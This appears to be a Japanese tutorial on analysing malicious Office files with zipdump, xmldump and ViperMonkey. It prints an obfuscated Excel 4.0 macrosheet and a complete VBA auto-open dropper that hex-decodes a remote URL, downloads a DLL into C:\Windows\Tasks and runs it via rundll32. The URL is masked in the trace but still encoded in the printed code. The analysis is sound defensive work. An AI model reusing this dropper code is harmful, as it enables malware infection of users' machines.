9 xl/macrosheets/intlsheet1.xml 0 1980-01-01 00:00:00
10 xl/theme/theme1.xml 0 1980-01-01 00:00:00
11 xl/styles.xml 0 1980-01-01 00:00:00
12 xl/sharedStrings.xml 0 1980-01-01 00:00:00
13 xl/drawings/drawing1.xml 0 1980-01-01 00:00:00
14 xl/media/image1.png 0 1980-01-01 00:00:00
15 xl/worksheets/_rels/sheet1.xml.rels 0 1980-01-01 00:00:00
16 xl/drawings/_rels/drawing1.xml.rels 0 1980-01-01 00:00:00
17 xl/calcChain.xml 0 1980-01-01 00:00:00
18 docProps/core.xml 0 1980-01-01 00:00:00
19 docProps/app.xml 0 1980-01-01 00:00:00
「-d」を追加すると中身を見ることができる。
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://
schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://s
chemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2
xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/a
c" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xm
lns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns
:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr
6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{A
0124FFD-D8B1-4C57-9FC3-DE9478087DFA}"><dimension ref="G8"/><sheetViews><sheetVie
w showFormulas="1" workbookViewId="0"><selection activeCell="B4" sqref="B4"/></s
heetView></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25
"/><cols><col min="7" max="7" width="255.7109375" bestFit="1" customWidth="1"/><
/cols><sheetData><row r="8" spans="7:7" x14ac:dyDescent="0.25"><c r="G8" t="b"><
f>FORMULA(Cdfea!P22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tg
bs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!
Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S15&Tgbfgs!F16,G13)=FORMULA(Cdfea!
P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR1"&Tgbfgs!Q5&Cdfe
a!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!
F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!G
16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)=FORMULA(Cdfea!P22&Cdfea!
J11&Cdfea!B18&Cdfea!P11&"NEVR2"&Tgbfgs!Q5&Cdfea!H9&Cdfea
!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I
10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!H14&Tgbfgs!
S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!
B18&Cdfea!P11&"NEVR3"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!
B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H
4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!I16&Tgbfgs!S15&Tgbfgs
!F16&Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!
P11&"NEVR4"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!
B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2
&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15&Tgbfgs!F16&Cdfea
!P13,G21)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR5
"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D
7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&a
mp;Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G23)=FORM
ULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR6"&Tgbfgs!Q
5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&
amp;Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&
amp;Tgbs!L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(Cdfea!P22&
amp;Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR7"&Tgbfgs!Q5&Cdfea!H9
&Cdfea!B15&Cdfea!I17&Cdfea!I3&Cdfea!H13&Cdfea!P11&Cdfea!
K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FORMULA(Cdfea!P22&Cdfea!H13
&Cdfea!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!H
9&Cdfea!P20&Tgbfgs!M12&Tgbfgs!N8&Tgbfgs!I4&Tgbs!R21&Tgbf
gs!G10&Cdfea!P15&Cdfea!P13,G29)=FORMULA(Cdfea!P22&Cdfea!G24&Cdfe
a!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfea!K23&Cdfea!P11&C
dfea!P13,G34)</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.
7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
「-t utf8 or utf16」を追加するとデコードすることができる。
xmldump.py
Officeファイルに含まれている、XMLファイルを解析してくれる。
「text」でXML内の要素から全ての文字列を抽出してくれる。
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm | x
mldump.py text
FORMULA(Cdfea!P22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F1
0&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S15&Tgbfgs!F16,G
13)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR1"&Tgbfgs!Q5&Cdfea!H9&C
dfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2
&Tgbs!Q9&Tgbfgs!J17&Tgbs!G16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)=FORMULA(Cdfea!
P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR2"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&
Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J1
7&Tgbs!H14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfe
a!B18&Cdfea!P11&"NEVR3"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&
Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!I16&Tgbfgs!
S15&Tgbfgs!F16&Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"N
EVR4"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&
Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15&Tgbfgs!F16&Cdf
ea!P13,G21)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR5"&Tgbfgs!Q5&Cd
fea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&
Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G23)=FORMUL
A(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR6"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cd
fea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&T
gbfgs!J17&Tgbs!L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(Cdfea!P22&Cdfea!
J11&Cdfea!B18&Cdfea!P11&"NEVR7"&Tgbfgs!Q5&Cdfea!H9&Cdfea!B15&Cdfea!I17&Cdfea!I3&
Cdfea!H13&Cdfea!P11&Cdfea!K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FORMULA(Cdfea!P22
&Cdfea!H13&Cdfea!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!H9&Cdfea!P20&Tg
bfgs!M12&Tgbfgs!N8&Tgbfgs!I4&Tgbs!R21&Tgbfgs!G10&Cdfea!P15&Cdfea!P13,G29)=FORMUL
A(Cdfea!P22&Cdfea!G24&Cdfea!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfea!K23&Cdfea!P11
&Cdfea!P13,G34)1
「wordtext」にすると、w:p要素の文字列を表示してくれる。
「elementtext」にすると、XMLファイルからすべての要素をその文字列とともに表示してくれる。
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm | x
mldump.py elementtext
xm:macrosheet: FORMULA(Cdfea!P22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&T
gbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S
15&Tgbfgs!F16,G13)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR1"&Tgbfg
s!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cd
fea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!G16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)
=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR2"&Tgbfgs!Q5&Cdfea!H9&Cdfe
a!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tg
bs!Q9&Tgbfgs!J17&Tgbs!H14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22
&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR3"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdf
ea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&T
gbs!I16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B
18&Cdfea!P11&"NEVR4"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgb
s!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15
&Tgbfgs!F16&Cdfea!P13,G21)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR
5"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgb
s!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!
P13,G23)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR6"&Tgbfgs!Q5&Cdfea
!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdf
ea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(C
dfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR7"&Tgbfgs!Q5&Cdfea!H9&Cdfea!B15&Cdfe
a!I17&Cdfea!I3&Cdfea!H13&Cdfea!P11&Cdfea!K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FO
RMULA(Cdfea!P22&Cdfea!H13&Cdfea!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!
H9&Cdfea!P20&Tgbfgs!M12&Tgbfgs!N8&Tgbfgs!I4&Tgbs!R21&Tgbfgs!G10&Cdfea!P15&Cdfea!
P13,G29)=FORMULA(Cdfea!P22&Cdfea!G24&Cdfea!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfe
a!K23&Cdfea!P11&Cdfea!P13,G34)1
dimension:
sheetViews:
sheetView:
selection:
sheetFormatPr:
cols:
col:
以下省略
「-u」を追加すると、URL文字列を抽出してくれる。
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm | x
mldump.py -u elementtext
{http://schemas.microsoft.com/office/excel/2006/main}macrosheet: FORMULA(Cdfea!P
22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfe
a!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S15&Tgbfgs!F16,G13)=FORMULA(Cdf
ea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR1"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B
15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs
!J17&Tgbs!G16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)=FORMULA(Cdfea!P22&Cdfea!J11&C
dfea!B18&Cdfea!P11&"NEVR2"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!
D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!H14&Tgbf
gs!S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11
&"NEVR3"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F
10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!I16&Tgbfgs!S15&Tgbfgs!F16&
Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR4"&Tgbfgs!Q5
&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!
H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G21)=FOR
MULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR5"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2
&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q
9&Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G23)=FORMULA(Cdfea!P22&Cdf
ea!J11&Cdfea!B18&Cdfea!P11&"NEVR6"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B
15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!
L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&C
dfea!P11&"NEVR7"&Tgbfgs!Q5&Cdfea!H9&Cdfea!B15&Cdfea!I17&Cdfea!I3&Cdfea!H13&Cdfea
!P11&Cdfea!K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FORMULA(Cdfea!P22&Cdfea!H13&Cdfe
a!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!H9&Cdfea!P20&Tgbfgs!M12&Tgbfgs
!N8&Tgbfgs!I4&Tgbs!R21&Tgbfgs!G10&Cdfea!P15&Cdfea!P13,G29)=FORMULA(Cdfea!P22&Cdf
ea!G24&Cdfea!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfea!K23&Cdfea!P11&Cdfea!P13,G34)
1
以下省略
ViperMonkey
悪意あるVBAマクロを動的解析してくれるツール。
Docker上で使うことができ、下記のコマンドを実行するだけで解析が始まる。
その時に検体はコンテナの中にコピーされて、そこで解析される。
$ docker/dockermonkey.sh sample.xls
_ ___ __ ___ __
| | / (_)___ ___ _____/ |/ /___ ____ / /_____ __ __
| | / / / __ \/ _ \/ ___/ /|_/ / __ \/ __ \/ //_/ _ \/ / / /
| |/ / / /_/ / __/ / / / / / /_/ / / / / ,< / __/ /_/ /
|___/_/ .___/\___/_/ /_/ /_/\____/_/ /_/_/|_|\___/\__, /
/_/ /____/
vmonkey 1.0.2 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues
===============================================================================
FILE: /root/sample.xls
-------------------------------------------------------------------------------
VBA MACRO ЭтаКнига.cls
in file: - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
Sub Workbook_Open()
Dim euvjhxge As Object
Dim tnukmirrugnryiyq As Object
Dim tdcivbfshcvnxzndtlc As String
Dim frwygfpnfwpcuyrbrni As String
tdcivbfshcvnxzndtlc = fmlnjifrotgwtih("687474703a2f2f36362e3135302e36362e3136372f73752e") & fmlnjifrotgwtih("646c6c")
frwygfpnfwpcuyrbrni = fmlnjifrotgwtih("433a5c5769") & fmlnjifrotgwtih("6e646f77735c5461736b735c73752e646c6c")
Set euvjhxge = CreateObject(fmlnjifrotgwtih("4d6963") & fmlnjifrotgwtih("726f736f66742e584d4c48545450"))
euvjhxge.Open fmlnjifrotgwtih("474554"), tdcivbfshcvnxzndtlc, False
euvjhxge.send
If euvjhxge.Status = 200 Then
Set tnukmirrugnryiyq = CreateObject(fmlnjifrotgwtih("41444f44422e") & fmlnjifrotgwtih("53747265616d"))
tnukmirrugnryiyq.Open
tnukmirrugnryiyq.Type = 1
tnukmirrugnryiyq.Write euvjhxge.responseBody
tnukmirrugnryiyq.SaveToFile frwygfpnfwpcuyrbrni, 2
tnukmirrugnryiyq.Close
End If
Dim ExecFile As Double
ExecFile = Shell(fmlnjifrotgwtih("72756e646c6c333220433a5c57696e646f77735c5461736b735c7375") & fmlnjifrotgwtih("2e646c6c2c20506c7567696e496e6974"))
End Sub
-------------------------------------------------------------------------------
PARSING VBA CODE:
-------------------------------------------------------------------------------
VBA MACRO Лист1.cls
in file: - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO hdxlonvwk.bas
in file: - OLE stream: u'_VBA_PROJECT_CUR/VBA/hdxlonvwk'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
Function fmlnjifrotgwtih(ByVal erhzhqcay As String) As String
Dim pctzqqipfx As Long
For pctzqqipfx = 1 To Len(erhzhqcay) Step 2
fmlnjifrotgwtih = fmlnjifrotgwtih & Chr$(Val("&H" & Mid$(erhzhqcay, pctzqqipfx, 2)))
Next pctzqqipfx
End Function
-------------------------------------------------------------------------------
PARSING VBA CODE:
-------------------------------------------------------------------------------
TRACING VBA CODE (entrypoint = Auto*):
Recorded Actions:
+----------------------+-----------------------------------------------+---------------------------------+
| Action | Parameters | Description |
+----------------------+-----------------------------------------------+---------------------------------+
| Start Regular | | All wildcard matches will match |
| Emulation | | |
| Found Entry Point | workbook_open | |
| CreateObject | ['Microsoft.XMLHTTP'] | Interesting Function Call |
| euvjhxge.Open | ['GET', 'hxxp://○○○/su.dll', False] | Interesting Function Call |
| Object.Method Call | ['GET', 'hxxp://○○○/su.dll', False] | euvjhxge.Open |
| GET | hxxp://○○○/su.dll | Interesting Function Call |
| CreateObject | ['ADODB.Stream'] | Interesting Function Call |
| tnukmirrugnryiyq.Ope | | Interesting Function Call |
| n | | |
| Object.Method Call | ['C:\\Windows\\Tasks\\su.dll', 2] | tnukmirrugnryiyq.SaveToFile |
| Write File | C:\Windows\Tasks\su.dll | SaveToFile |
| Dropped File Hash | 21eac00ec11c89e381668f3e36bb1b24e98f79a41c44f | File Name: ADODB.Stream |
| | 49b2b7689aa5bb222f1 | |
| Execute Command | rundll32 C:\Windows\Tasks\su.dll, PluginInit | Shell function |
+----------------------+-----------------------------------------------+---------------------------------+
Intermediate IOCs:
+---------------------------------------------------------+
hxxp://○○○/su.dll
+---------------------------------------------------------+
VBA Builtins Called: ['Chr', 'CreateObject', 'Len', 'Mid', 'Shell', 'Val']
Decoded Strings (11):
hxxp://○○○/su.
dll
C:\Wi
ndows\Tasks\su.dll
Mic
rosoft.XMLHTTP
GET
ADODB.
Stream
rundll32 C:\Windows\Tasks\su
.dll, PluginInit
Finished analyzing /root/sample.xls .
adding: root/sample.xls_artifacts/ (stored 0%)
adding: root/sample.xls_artifacts/ADODB.Stream (stored 0%)
[*] Dropped files are in sample.xls_artifacts.zip
[*] Done - Killing docker container c89da96207dbfe2f16469e979ca63ac3bc4a0efac4704526e89b2613570fd817
※URLの一部を置き換えています。
実行したコマンドやプロセス・レジストリの挙動、通信先などが書かれたレポートが出力されている。